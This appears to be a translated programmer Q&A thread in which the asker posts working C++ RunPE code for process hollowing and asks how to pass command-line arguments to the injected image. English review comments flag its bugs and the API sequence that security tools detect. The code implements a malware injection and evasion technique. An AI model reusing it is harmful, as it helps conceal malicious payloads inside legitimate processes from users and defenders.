
我想了解整个进程挖空(又名动态分叉)的概念实际上是如何工作的。C++ 进程挖空/动态分叉

我很好奇的一件事是:如何将命令行参数传递给分叉出来的进程?

以下是我正在学习的代码(完全正常工作),但我找不出如何为正在内存中执行的文件添加命令行(CMD)参数的解决方案。

Hollow.h

// Function-pointer type matching ntdll's NtUnmapViewOfSection; the function is
// resolved at run time with GetProcAddress inside runPE::run rather than linked.
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress); 

class runPE{ 
public: 
    // Replaces the image of a freshly created, suspended instance of szFilePath
    // with the in-memory PE image at pFile and then resumes it (what the
    // question calls process hollowing / dynamic forking).
    //
    // szFilePath: path of the executable launched as the host process.
    // pFile:      pointer to a complete PE file image held in memory. It is
    //             released with VirtualFree(..., MEM_RELEASE) on every exit
    //             path (including validation failures), so it must have come
    //             from VirtualAlloc and the caller must not use it afterwards.
    //
    // Only the 32-bit layout is handled: Ebx/Eax from the x86 CONTEXT,
    // 4-byte remote reads/writes, DWORD(pointer) casts and hard-coded header
    // sizes. No return value of ReadProcessMemory / WriteProcessMemory /
    // SetThreadContext is checked, and the process and thread handles in PI
    // are never closed.
    //
    // Defender's note: this exact API sequence - CreateProcess with
    // CREATE_SUSPENDED, NtUnmapViewOfSection, VirtualAllocEx with
    // PAGE_EXECUTE_READWRITE, WriteProcessMemory, SetThreadContext and
    // ResumeThread against another process - is the canonical
    // process-hollowing pattern that EDR/ETW-based detections key on.
    void run(LPSTR szFilePath, PVOID pFile) 
    { 
     PIMAGE_DOS_HEADER IDH;  
     PIMAGE_NT_HEADERS INH;  
     PIMAGE_SECTION_HEADER ISH; 
     PROCESS_INFORMATION PI;  
     STARTUPINFOA SI;   
     PCONTEXT CTX;    
     PDWORD dwImageBase;   
     NtUnmapViewOfSection xNtUnmapViewOfSection; 
     LPVOID pImageBase;   
     int Count;     
     // Minimal validation of the source image: "MZ" then "PE\0\0". The size of
     // the buffer behind pFile is never passed in, so nothing below bounds-checks
     // e_lfanew or the section offsets against it.
     IDH = PIMAGE_DOS_HEADER(pFile); 
     if (IDH->e_magic == IMAGE_DOS_SIGNATURE) 
     { 
      INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew); 
      if (INH->Signature == IMAGE_NT_SIGNATURE) 
      { 
       RtlZeroMemory(&SI, sizeof(SI)); 
       RtlZeroMemory(&PI, sizeof(PI)); 
       // Host process is created suspended; every optional argument is NULL.
       if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) 
       { 
        // Thread context of the suspended primary thread (x86 register set).
        CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE)); 
        CTX->ContextFlags = CONTEXT_FULL; 
        if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) 
        { 
         // Reads 4 bytes at Ebx+8 in the target and treats them as the
         // host's current image base. NOTE(review): this relies on Ebx
         // pointing at the PEB of a suspended 32-bit process - not verifiable
         // from this listing.
         ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL); 
         // If the host already occupies the new image's preferred base,
         // unmap it so the allocation below can land there.
         if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase) 
         { 
          xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection")); 
          xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase)); 
         } 
         // 0x3000 == MEM_COMMIT | MEM_RESERVE. The whole image is mapped RWX at
         // its preferred base; no relocation handling exists, so a failure here
         // (or a base that is still occupied) leaves the host suspended forever:
         // there is no else branch that resumes or terminates it.
         pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); 
         if (pImageBase) 
         { 
          // Headers first, then each section from its raw file offset to its
          // virtual address. 248 is sizeof(IMAGE_NT_HEADERS32) and 40 is
          // sizeof(IMAGE_SECTION_HEADER), hard-coded instead of taken from
          // FileHeader.SizeOfOptionalHeader. PointerToRawData/SizeOfRawData are
          // trusted as-is, so a malformed image reads out of bounds in this
          // process.
          WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL); 
          for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++) 
          { 
           ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40)); 
           WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL); 
          } 
          // Patch the image-base field read above, point Eax at the new
          // entry point, apply the context and let the thread run.
          WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL); 
          CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint; 
          SetThreadContext(PI.hThread, LPCONTEXT(CTX)); 
          ResumeThread(PI.hThread); 
         } 

        } 
       } 
      } 
     } 
     // Caller's image buffer is released unconditionally (ownership transfer);
     // the CONTEXT allocation and the PI handles are not.
     VirtualFree(pFile, 0, MEM_RELEASE); 
    } 
}; 

主要

// Launches a hollowed copy of this executable's own path and hands it the
// in-memory PE image `shellcode`, which is declared outside this listing.
int main() 
{ 
    runPE rp; 
    TCHAR szFilePath[1024]; 
    // Path of the current module becomes the host process. The return value
    // (0 on failure, the buffer size on truncation) is not checked.
    GetModuleFileNameA(0, LPSTR(szFilePath), 1024); 
    // NOTE(review): a TCHAR buffer is handed to the ANSI API through an LPSTR
    // cast with a size of 1024; this is only consistent when TCHAR is char
    // (non-UNICODE build) - confirm the project's character-set setting.
    // Ownership of `shellcode` passes to run(), which VirtualFree()s it.
    rp.run(LPSTR(szFilePath), shellcode); 
    //Sleep(INFINITE); 
    return 0; 
} 

但如何将参数传递给正在分叉自身/在内存中执行的代码?我已经在这个问题上折腾了超过7个小时却没有找到解决方案,请有人给我指出正确的方向,或告诉我这是如何完成的。

回答


您总是可以使用某种进程间(interprocess)通信:

  1. 制造假窗口并使用窗口消息
  2. 邮件槽(mailslot)
  3. 套接字(socket)
  4. 文件
  5. 共享内存

你能告诉我一个例子吗? – user2404495